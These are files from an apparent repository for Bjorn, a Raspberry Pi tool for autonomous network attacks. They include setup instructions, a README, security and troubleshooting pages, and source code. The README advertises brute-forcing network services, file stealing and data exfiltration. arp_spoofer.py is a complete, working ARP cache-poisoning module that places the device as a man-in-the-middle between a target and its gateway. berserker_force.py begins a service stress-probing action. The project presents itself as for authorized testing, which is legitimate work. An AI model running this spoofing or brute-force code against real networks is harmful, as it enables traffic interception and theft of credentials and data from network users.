To prevent `OSError: [Errno 24] Too many open files`, it's essential to increase the file descriptor limits.
##### 4.1: Modify File Descriptor Limits for All Users
Edit `/etc/security/limits.conf`:
```bash
sudo vi /etc/security/limits.conf
```
Add the following lines:
```
* soft nofile 65535
* hard nofile 65535
root soft nofile 65535
root hard nofile 65535
```
##### 4.2: Configure Systemd Limits
Edit `/etc/systemd/system.conf`:
```bash
sudo vi /etc/systemd/system.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
Edit `/etc/systemd/user.conf`:
```bash
sudo vi /etc/systemd/user.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
##### 4.3: Create or Modify `/etc/security/limits.d/90-nofile.conf`
```bash
sudo vi /etc/security/limits.d/90-nofile.conf
```
Add:
```
root soft nofile 65535
root hard nofile 65535
```
##### 4.4: Adjust the System-wide File Descriptor Limit
Edit `/etc/sysctl.conf`:
```bash
sudo vi /etc/sysctl.conf
```
Add:
```
fs.file-max = 2097152
```
Apply the changes:
```bash
sudo sysctl -p
```
#### Step 5: Reload Systemd and Apply Changes
Reload systemd to apply the new file descriptor limits:
```bash
sudo systemctl daemon-reload
```
#### Step 6: Modify PAM Configuration Files
PAM (Pluggable Authentication Modules) manages how limits are enforced for user sessions. To ensure that the new file descriptor limits are respected, update the following configuration files.
##### Step 6.1: Edit `/etc/pam.d/common-session` and `/etc/pam.d/common-session-noninteractive`
```bash
sudo vi /etc/pam.d/common-session
sudo vi /etc/pam.d/common-session-noninteractive
```
Add this line at the end of both files:
```
session required pam_limits.so
```
This ensures that the limits set in `/etc/security/limits.conf` are enforced for all user sessions.
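After rebooting, you can verify that the new limits are actually in effect for your session — a standard-library check, nothing Bjorn-specific:

```python
import resource

# Query the current soft and hard "number of open files" limits
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
print(f"nofile limits: soft={soft} hard={hard}")
# With the configuration above applied, both should report 65535.
```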
#### Step 7: Configure Services
##### 7.1: Bjorn Service
Create the service file:
```bash
sudo vi /etc/systemd/system/bjorn.service
```
Add the following content:
```ini
[Unit]
Description=Bjorn Service
DefaultDependencies=no
Before=basic.target
After=local-fs.target
[Service]
ExecStartPre=/home/bjorn/Bjorn/kill_port_8000.sh
ExecStart=/usr/bin/python3 /home/bjorn/Bjorn/Bjorn.py
WorkingDirectory=/home/bjorn/Bjorn
StandardOutput=inherit
StandardError=inherit
Restart=always
User=root
# Check open files and restart if it reached the limit (ulimit -n buffer of 1000)
ExecStartPost=/bin/bash -c 'FILE_LIMIT=$(ulimit -n); THRESHOLD=$(( FILE_LIMIT - 1000 )); while :; do TOTAL_OPEN_FILES=$(lsof | wc -l); if [ "$TOTAL_OPEN_FILES" -ge "$THRESHOLD" ]; then echo "File descriptor threshold reached: $TOTAL_OPEN_FILES (threshold: $THRESHOLD). Restarting service."; systemctl restart bjorn.service; exit 0; fi; sleep 10; done &'
[Install]
WantedBy=multi-user.target
```
##### 7.2: Port 8000 Killer Script
Create the script to free up port 8000:
```bash
vi /home/bjorn/Bjorn/kill_port_8000.sh
```
Add:
```bash
#!/bin/bash
PORT=8000
PIDS=$(lsof -t -i:$PORT)
if [ -n "$PIDS" ]; then
echo "Killing PIDs using port $PORT: $PIDS"
kill -9 $PIDS
fi
```
Make the script executable:
```bash
chmod +x /home/bjorn/Bjorn/kill_port_8000.sh
```
##### 7.3: USB Gadget Configuration
Modify `/boot/firmware/cmdline.txt`:
```bash
sudo vi /boot/firmware/cmdline.txt
```
Add the following right after `rootwait`:
```
modules-load=dwc2,g_ether
```
Modify `/boot/firmware/config.txt`:
```bash
sudo vi /boot/firmware/config.txt
```
Add at the end of the file:
```
dtoverlay=dwc2
```
Create the USB gadget script:
```bash
sudo vi /usr/local/bin/usb-gadget.sh
```
Add the following content:
```bash
#!/bin/bash
set -e
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: ECM network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/ecm.usb0
# Check for existing symlink and remove if necessary
if [ -L configs/c.1/ecm.usb0 ]; then
rm configs/c.1/ecm.usb0
fi
ln -s functions/ecm.usb0 configs/c.1/
# Ensure the device is not busy before listing available USB device controllers
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
# Check if the usb0 interface is already configured
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0
else
echo "Interface usb0 already configured."
fi
```
Make the script executable:
```bash
sudo chmod +x /usr/local/bin/usb-gadget.sh
```
Create the systemd service:
```bash
sudo vi /etc/systemd/system/usb-gadget.service
```
Add:
```ini
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
```
Configure `usb0`:
```bash
sudo vi /etc/network/interfaces
```
Add:
```bash
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
```
Reload the services:
```bash
sudo systemctl daemon-reload
sudo systemctl enable systemd-networkd
sudo systemctl enable usb-gadget
sudo systemctl start systemd-networkd
sudo systemctl start usb-gadget
```
You must reboot before the Pi can be used as a USB gadget (with the static IP above).
###### Windows PC Configuration
Set the static IP address on your Windows PC:
- **IP Address**: `172.20.2.2`
- **Subnet Mask**: `255.255.255.0`
- **Default Gateway**: `172.20.2.1`
- **DNS Servers**: `8.8.8.8`, `8.8.4.4`
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

LICENSE
MIT License
Copyright (c) 2024 infinition
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

README.md
# <img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="33"> Bjorn
![Python](https://img.shields.io/badge/Python-3776AB?logo=python&logoColor=fff)
![Status](https://img.shields.io/badge/Status-Development-blue.svg)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Reddit](https://img.shields.io/badge/Reddit-Bjorn__CyberViking-orange?style=for-the-badge&logo=reddit)](https://www.reddit.com/r/Bjorn_CyberViking)
[![Discord](https://img.shields.io/badge/Discord-Join%20Us-7289DA?style=for-the-badge&logo=discord)](https://discord.com/invite/B3ZH9taVfT)
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="150">
<img src="https://github.com/user-attachments/assets/1b490f07-f28e-4418-8d41-14f1492890c6" alt="bjorn_epd-removebg-preview" width="150">
</p>
Bjorn is a sophisticated, autonomous, « Tamagotchi-like » network scanning, vulnerability assessment, and offensive security tool designed to run on a Raspberry Pi equipped with a 2.13-inch e-Paper HAT. This document provides a detailed explanation of the project.
## 📚 Table of Contents
- [Introduction](#-introduction)
- [Features](#-features)
- [Getting Started](#-getting-started)
- [Prerequisites](#-prerequisites)
- [Installation](#-installation)
- [Quick Start](#-quick-start)
- [Usage Example](#-usage-example)
- [Contributing](#-contributing)
- [License](#-license)
- [Contact](#-contact)
## 📄 Introduction
Bjorn is a powerful tool designed to perform comprehensive network scanning, vulnerability assessment, and data exfiltration. Its modular design and extensive configuration options allow for flexible and targeted operations. By combining different actions and orchestrating them intelligently, Bjorn can provide valuable insights into network security and help identify and mitigate potential risks.
The e-Paper HAT display and web interface make it easy to monitor and interact with Bjorn, providing real-time updates and status information. With its extensible architecture and customizable actions, Bjorn can be adapted to suit a wide range of security testing and monitoring needs.
## 🌟 Features
- **Network Scanning**: Identifies live hosts and open ports on the network.
- **Vulnerability Assessment**: Performs vulnerability scans using Nmap and other tools.
- **System Attacks**: Conducts brute-force attacks on various services (FTP, SSH, SMB, RDP, Telnet, SQL).
- **File Stealing**: Extracts data from vulnerable services.
- **User Interface**: Real-time display on the e-Paper HAT and web interface for monitoring and interaction.
![Bjorn Display](https://github.com/infinition/Bjorn/assets/37984399/bcad830d-77d6-4f3e-833d-473eadd33921)
## 🚀 Getting Started
## 📌 Prerequisites
### 📋 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📋 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
I did not develop Bjorn on the Raspberry Pi Zero W2 (64-bit), but several users have confirmed that the installation works perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment, the e-Paper screens V2 and V4 have been tested and implemented.
I just hope the V1 & V3 will work the same.
### 🔨 Installation
The fastest way to install Bjorn is using the automatic installation script:
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh && sudo ./install_bjorn.sh
# Choose option 1 for automatic installation. It may take a while, as many packages and modules will be installed. You must reboot at the end.
```
For **detailed information** about the **installation** process, see the [Install Guide](INSTALL.md).
## ⚡ Quick Start
**Need help? Struggling to find Bjorn's IP after the installation?**
Use my Bjorn Detector & SSH Launcher:
[https://github.com/infinition/bjorn-detector](https://github.com/infinition/bjorn-detector)
![ezgif-1-a310f5fe8f](https://github.com/user-attachments/assets/182f82f0-5c3a-48a9-a75e-37b9cfa2263a)
**Hmm, you still need help?**
For **detailed information** about **troubleshooting**, see [Troubleshooting](TROUBLESHOOTING.md).
**Quick Installation**: see [Getting Started](#-getting-started) for the fastest way to install **Bjorn**.
## 💡 Usage Example
Here's a demonstration of how Bjorn autonomously hunts through your network like a Viking raider (fake demo for illustration):
```bash
# Reconnaissance Phase
[NetworkScanner] Discovering alive hosts...
[+] Host found: 192.168.1.100
├── Ports: 22,80,445,3306
└── MAC: 00:11:22:33:44:55
# Attack Sequence
[NmapVulnScanner] Found vulnerabilities on 192.168.1.100
├── MySQL 5.5 < 5.7 - User Enumeration
└── SMB - EternalBlue Candidate
[SSHBruteforce] Cracking credentials...
[+] Success! user:password123
[StealFilesSSH] Extracting sensitive data...
# Automated Data Exfiltration
[SQLBruteforce] Database accessed!
[StealDataSQL] Dumping tables...
[SMBBruteforce] Share accessible
[+] Found config files, credentials, backups...
```
This is just a demo output - actual results will vary based on your network and target configuration.
All discovered data is automatically organized in the data/output/ directory, viewable through both the e-Paper display (as indicators) and web interface.
Bjorn works tirelessly, expanding its network knowledge base and growing stronger with each discovery.
No constant monitoring needed - just deploy and let Bjorn do what it does best: hunt for vulnerabilities.
## 🔧 Expand Bjorn's Arsenal!
Bjorn is designed to be a community-driven weapon forge. Create and share your own attack modules!
⚠️ **For educational and authorized testing purposes only** ⚠️
## 🤝 Contributing
The project welcomes contributions in:
- New attack modules.
- Bug fixes.
- Documentation.
- Feature improvements.
For **detailed information** about the **contributing** process, see the [Contributing Docs](CONTRIBUTING.md), [Code of Conduct](CODE_OF_CONDUCT.md) and [Development Guide](DEVELOPMENT.md).
## 📫 Contact
- **Report Issues**: Via GitHub.
- **Guidelines**:
- Follow ethical guidelines.
- Document reproduction steps.
- Provide logs and context.
- **Author**: __infinition__
- **GitHub**: [infinition/Bjorn](https://github.com/infinition/Bjorn)
## 🌠 Stargazers
[![Star History Chart](https://api.star-history.com/svg?repos=infinition/bjorn&type=Date)](https://star-history.com/#infinition/bjorn&Date)
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

# 🔒 Security Policy
The security policy for the **Bjorn** repository includes the required compliance matrix and artifact mapping.
## 🧮 Supported Versions
We provide security updates for the following versions of our project:
| Version | Status | Secure |
| ------- |-------------| ------ |
| 1.0.0 | Development | No |
## 🛡️ Security Practices
- We follow best practices for secure coding and infrastructure management.
- Regular security audits and code reviews are conducted to identify and mitigate potential risks.
- Dependencies are monitored and updated to address known vulnerabilities.
## 📲 Security Updates
- Security updates are released as soon as possible after a vulnerability is confirmed.
- Users are encouraged to update to the latest version to benefit from security fixes.
## 🚨 Reporting a Vulnerability
If you discover a security vulnerability within this project, please follow these steps:
1. **Do not create a public issue.** Instead, contact us directly to responsibly disclose the vulnerability.
2. **Email** [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com) with the following information:
- A description of the vulnerability.
- Steps to reproduce the issue.
- Any potential impact or severity.
3. **Wait for a response.** We will acknowledge your report and work with you to address the issue promptly.
## 🛰️ Additional Resources
- [OWASP Security Guidelines](https://owasp.org/)
Thank you for helping us keep this project secure!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

# 🐛 Known Issues and Troubleshooting
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Current Development Issues](#-current-development-issues)
- [Troubleshooting Steps](#-troubleshooting-steps)
- [License](#-license)
## 🪲 Current Development Issues
### Long Runtime Issue
- **Problem**: `OSError: [Errno 24] Too many open files`
- **Status**: Partially resolved with system limits configuration.
- **Workaround**: Implemented file descriptor limits increase.
- **Monitoring**: Check open files with `lsof -p $(pgrep -f Bjorn.py) | wc -l`
- **Note**: The logs periodically report the current count as `(FD : XXX)`.
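The same number can be obtained without `lsof` by counting a process's descriptor entries in `/proc` — a Linux-only sketch:

```python
import os

def open_fd_count(pid):
    """Count open file descriptors of a process via /proc (Linux)."""
    return len(os.listdir(f"/proc/{pid}/fd"))

# e.g. open_fd_count(os.getpid()) for the current process
```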
## 🛠️ Troubleshooting Steps
### Service Issues
```bash
# Follow the bjorn service journal
journalctl -fu bjorn.service
# Check service status
sudo systemctl status bjorn.service
# View detailed logs
sudo journalctl -u bjorn.service -f
# or
sudo tail -f /home/bjorn/Bjorn/data/logs/*
# Check port 8000 usage
sudo lsof -i :8000
```
### Display Issues
```bash
# Verify SPI devices
ls /dev/spi*
# Check user permissions
sudo usermod -a -G spi,gpio bjorn
```
### Network Issues
```bash
# Check network interfaces
ip addr show
# Test USB gadget interface
ip link show usb0
```
### Permission Issues
```bash
# Fix ownership
sudo chown -R bjorn:bjorn /home/bjorn/Bjorn
# Fix permissions
sudo chmod -R 755 /home/bjorn/Bjorn
```
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

action_scheduler.py (new file, 1651 lines — diff too large to display)
@@ -1,15 +1,9 @@
#Test script to add more actions to BJORN
from rich.console import Console
from shared import SharedData
b_class = "IDLE"
b_module = "idle_action"
b_status = "idle_action"
b_port = None
b_parent = None
b_module = "idle"
b_status = "IDLE"
console = Console()
class IDLE:
def __init__(self, shared_data):

(Binary image files added — action icons — not shown.)

actions/arp_spoofer.py (new file, 330 lines)
"""
arp_spoofer.py — ARP Cache Poisoning for Man-in-the-Middle positioning.
Ethical cybersecurity lab action for Bjorn framework.
Performs bidirectional ARP spoofing between a target host and the network
gateway. Restores ARP tables on completion or interruption.
Orchestrator integration:
- Orchestrator provides (ip, port, row) for the target host.
- Gateway IP is auto-detected from system routing table or shared config.
- Results persisted to JSON output and logged for RL training.
- Fully integrated with EPD display (progress, status, comments).
"""
import os
import time
import logging
import json
import subprocess
import datetime
from typing import Dict, Optional, Tuple
from shared import SharedData
from logger import Logger
logger = Logger(name="arp_spoofer.py", level=logging.DEBUG)
# Silence scapy warnings
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
logging.getLogger("scapy").setLevel(logging.ERROR)
# ──────────────────────── Action Metadata ────────────────────────
b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_status = "arp_spoof"
b_port = None
b_service = '[]'
b_trigger = "on_host_alive"
b_parent = None
b_action = "aggressive"
b_category = "network_attack"
b_name = "ARP Spoofer"
b_description = (
"Bidirectional ARP cache poisoning between target host and gateway for "
"MITM positioning. Detects gateway automatically, spoofs both directions, "
"and cleanly restores ARP tables on completion. Educational lab use only."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "ARPSpoof.png"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 30
b_cooldown = 3600
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 2
b_risk_level = "high"
b_enabled = 1
b_tags = ["mitm", "arp", "network", "layer2"]
b_args = {
"duration": {
"type": "slider", "label": "Duration (s)",
"min": 10, "max": 300, "step": 10, "default": 60,
"help": "How long to maintain the ARP poison (seconds)."
},
"interval": {
"type": "slider", "label": "Packet interval (s)",
"min": 1, "max": 10, "step": 1, "default": 2,
"help": "Delay between ARP poison packets."
},
}
b_examples = [
{"duration": 60, "interval": 2},
{"duration": 120, "interval": 1},
]
b_docs_url = "docs/actions/ARPSpoof.md"
# ──────────────────────── Constants ──────────────────────────────
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "arp")
class ARPSpoof:
"""ARP cache poisoning action integrated with Bjorn orchestrator."""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self._scapy_ok = False
self._check_scapy()
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except OSError:
pass
logger.info("ARPSpoof initialized")
def _check_scapy(self):
try:
from scapy.all import ARP, Ether, sendp, sr1 # noqa: F401
self._scapy_ok = True
except ImportError:
logger.error("scapy not available — ARPSpoof will not function")
self._scapy_ok = False
# ─────────────────── Identity Cache ──────────────────────
def _refresh_ip_identity_cache(self):
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hn = (r.get("hostnames") or "").split(";", 1)[0]
for ip_addr in [p.strip() for p in (r.get("ips") or "").split(";") if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, hn)
def _mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
# ─────────────────── Gateway Detection ──────────────────
def _detect_gateway(self) -> Optional[str]:
"""Auto-detect the default gateway IP."""
gw = getattr(self.shared_data, "gateway_ip", None)
if gw and gw != "0.0.0.0":
return gw
try:
result = subprocess.run(
["ip", "route", "show", "default"],
capture_output=True, text=True, timeout=5
)
if result.returncode == 0 and result.stdout.strip():
parts = result.stdout.strip().split("\n")[0].split()
idx = parts.index("via") if "via" in parts else -1
if idx >= 0 and idx + 1 < len(parts):
return parts[idx + 1]
except Exception as e:
logger.debug(f"Gateway detection via ip route failed: {e}")
try:
from scapy.all import conf as scapy_conf
gw = scapy_conf.route.route("0.0.0.0")[2]
if gw and gw != "0.0.0.0":
return gw
except Exception as e:
logger.debug(f"Gateway detection via scapy failed: {e}")
return None
# ─────────────────── ARP Operations ──────────────────────
@staticmethod
def _get_mac_via_arp(ip: str, iface: str = None, timeout: float = 2.0) -> Optional[str]:
"""Resolve IP to MAC via ARP request."""
try:
from scapy.all import ARP, sr1
kwargs = {"timeout": timeout, "verbose": False}
if iface:
kwargs["iface"] = iface
resp = sr1(ARP(pdst=ip), **kwargs)
if resp and hasattr(resp, "hwsrc"):
return resp.hwsrc
except Exception as e:
logger.debug(f"ARP resolution failed for {ip}: {e}")
return None
@staticmethod
def _send_arp_poison(target_ip, target_mac, spoof_ip, iface=None):
"""Send a single ARP poison packet (op=is-at)."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip
)
kwargs = {"verbose": False}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP poison send failed to {target_ip}: {e}")
@staticmethod
def _send_arp_restore(target_ip, target_mac, real_ip, real_mac, iface=None):
"""Restore legitimate ARP mapping with multiple packets."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac,
psrc=real_ip, hwsrc=real_mac
)
kwargs = {"verbose": False, "count": 5}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP restore failed for {target_ip}: {e}")
# ─────────────────── Main Execute ────────────────────────
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""Execute bidirectional ARP spoofing against target host."""
self.shared_data.bjorn_orch_status = "ARPSpoof"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip}
if not self._scapy_ok:
logger.error("scapy unavailable, cannot perform ARP spoof")
return "failed"
target_mac = None
gateway_mac = None
gateway_ip = None
iface = None
try:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or ""
hostname = row.get("Hostname") or row.get("hostname") or ""
# 1) Detect gateway
gateway_ip = self._detect_gateway()
if not gateway_ip:
logger.error(f"Cannot detect gateway for ARP spoof on {ip}")
return "failed"
if gateway_ip == ip:
logger.warning(f"Target {ip} IS the gateway — skipping")
return "failed"
logger.info(f"ARP Spoof: target={ip} gateway={gateway_ip}")
self.shared_data.log_milestone(b_class, "GatewayID", f"Poisoning {ip} <-> {gateway_ip}")
self.shared_data.comment_params = {"ip": ip, "gateway": gateway_ip}
self.shared_data.bjorn_progress = "10%"
# 2) Resolve MACs
iface = getattr(self.shared_data, "default_network_interface", None)
target_mac = self._get_mac_via_arp(ip, iface)
gateway_mac = self._get_mac_via_arp(gateway_ip, iface)
if not target_mac:
logger.error(f"Cannot resolve MAC for target {ip}")
return "failed"
if not gateway_mac:
logger.error(f"Cannot resolve MAC for gateway {gateway_ip}")
return "failed"
self.shared_data.bjorn_progress = "20%"
logger.info(f"Resolved — target_mac={target_mac}, gateway_mac={gateway_mac}")
self.shared_data.log_milestone(b_class, "PoisonActive", f"MACs resolved, starting spoof")
# 3) Spoofing loop
duration = int(getattr(self.shared_data, "arp_spoof_duration", 60))
interval = max(1, int(getattr(self.shared_data, "arp_spoof_interval", 2)))
packets_sent = 0
start_time = time.time()
while (time.time() - start_time) < duration:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit — stopping ARP spoof")
break
self._send_arp_poison(ip, target_mac, gateway_ip, iface)
self._send_arp_poison(gateway_ip, gateway_mac, ip, iface)
packets_sent += 2
elapsed = time.time() - start_time
pct = min(90, int(20 + (elapsed / max(duration, 1)) * 70))
self.shared_data.bjorn_progress = f"{pct}%"
if packets_sent % 20 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Injected {packets_sent} poison pkts")
time.sleep(interval)
# 4) Restore ARP tables
self.shared_data.bjorn_progress = "95%"
logger.info("Restoring ARP tables...")
self.shared_data.log_milestone(b_class, "RestoreStart", f"Healing {ip} and {gateway_ip}")
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
# 5) Save results
elapsed_total = time.time() - start_time
result_data = {
"timestamp": datetime.datetime.now().isoformat(),
"target_ip": ip, "target_mac": target_mac,
"gateway_ip": gateway_ip, "gateway_mac": gateway_mac,
"duration_s": round(elapsed_total, 1),
"packets_sent": packets_sent,
"hostname": hostname, "mac_address": mac
}
try:
ts = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
out_file = os.path.join(OUTPUT_DIR, f"arp_spoof_{ip}_{ts}.json")
with open(out_file, "w") as f:
json.dump(result_data, f, indent=2)
except Exception as e:
logger.error(f"Failed to save results: {e}")
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Restored tables after {packets_sent} pkts")
if self.shared_data.orchestrator_should_exit:
return "interrupted"
return "success"
except Exception as e:
logger.error(f"ARPSpoof failed for {ip}: {e}")
if target_mac and gateway_mac and gateway_ip:
try:
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
logger.info("Emergency ARP restore sent after error")
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
if __name__ == "__main__":
shared_data = SharedData()
try:
spoofer = ARPSpoof(shared_data)
logger.info("ARPSpoof module ready.")
except Exception as e:
logger.error(f"Error: {e}")
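For readers unfamiliar with why `execute()` poisons both directions and then restores both, the cache-level effect can be sketched with in-memory stand-ins for the two ARP tables. All IPs and MACs below are invented for illustration; the real action sends scapy ARP replies rather than writing dicts:

```python
# Illustrative only: simulate the bidirectional poison/restore cycle above
# against dict stand-ins for the target's and gateway's ARP caches.
ATTACKER = "aa:aa:aa:aa:aa:aa"
TARGET_MAC = "11:11:11:11:11:11"
GATEWAY_MAC = "22:22:22:22:22:22"

target_arp = {"192.168.1.1": GATEWAY_MAC}   # target's view of the gateway
gateway_arp = {"192.168.1.50": TARGET_MAC}  # gateway's view of the target

def poison(cache, ip, spoofed_mac):
    """One spoofed ARP reply: '<ip> is-at <spoofed_mac>'."""
    cache[ip] = spoofed_mac

def restore(cache, ip, real_mac):
    """A gratuitous ARP carrying the real MAC heals the entry."""
    cache[ip] = real_mac

# Both directions must be poisoned for traffic to transit the attacker;
# poisoning only one side intercepts only half of each conversation.
poison(target_arp, "192.168.1.1", ATTACKER)
poison(gateway_arp, "192.168.1.50", ATTACKER)
mitm = target_arp["192.168.1.1"] == ATTACKER == gateway_arp["192.168.1.50"]

# Mirror of step 4 in execute(): put the real MACs back on both sides.
restore(target_arp, "192.168.1.1", GATEWAY_MAC)
restore(gateway_arp, "192.168.1.50", TARGET_MAC)
```

This is why the error path also attempts an emergency restore: leaving either cache poisoned cuts the victim off once the attacker stops forwarding.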

617
actions/berserker_force.py Normal file
View File

@@ -0,0 +1,617 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
berserker_force.py -- Service resilience / stress testing (Pi Zero friendly, orchestrator compatible).
What it does:
- Phase 1 (Baseline): Measures TCP connect response times per port (3 samples each).
- Phase 2 (Stress Test): Runs a rate-limited load test using TCP connect, optional SYN probes
(scapy), HTTP probes (urllib), or mixed mode.
- Phase 3 (Post-stress): Re-measures baseline to detect degradation.
- Phase 4 (Analysis): Computes per-port degradation percentages, writes a JSON report.
This is NOT a DoS tool. It sends measured, rate-limited probes and records how the
target's response times change under light load. Max 50 req/s to stay RPi-safe.
Output is saved to data/output/stress/<ip>_<timestamp>.json
"""
import json
import logging
import os
import random
import socket
import ssl
import statistics
import time
from datetime import datetime, timezone
from typing import Any, Dict, List, Optional
from urllib.request import Request, urlopen
from urllib.error import URLError
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="berserker_force.py", level=logging.DEBUG)
# -------------------- Scapy (optional) ----------------------------------------
_HAS_SCAPY = False
try:
from scapy.all import IP, TCP, sr1  # type: ignore
_HAS_SCAPY = True
except ImportError:
logger.info("scapy not available -- SYN probe mode will fall back to TCP connect")
# -------------------- Action metadata (AST-friendly) --------------------------
b_class = "BerserkerForce"
b_module = "berserker_force"
b_status = "berserker_force"
b_port = None
b_parent = None
b_service = '[]'
b_trigger = "on_port_change"
b_action = "aggressive"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 15
b_cooldown = 7200
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 1
b_risk_level = "high"
b_enabled = 1
b_category = "stress"
b_name = "Berserker Force"
b_description = (
"Service resilience and stress-testing action. Measures baseline response "
"times, applies controlled TCP/SYN/HTTP load, then re-measures to quantify "
"degradation. Rate-limited to 50 req/s max (RPi-safe). No actual DoS -- "
"just measured probing with structured JSON reporting."
)
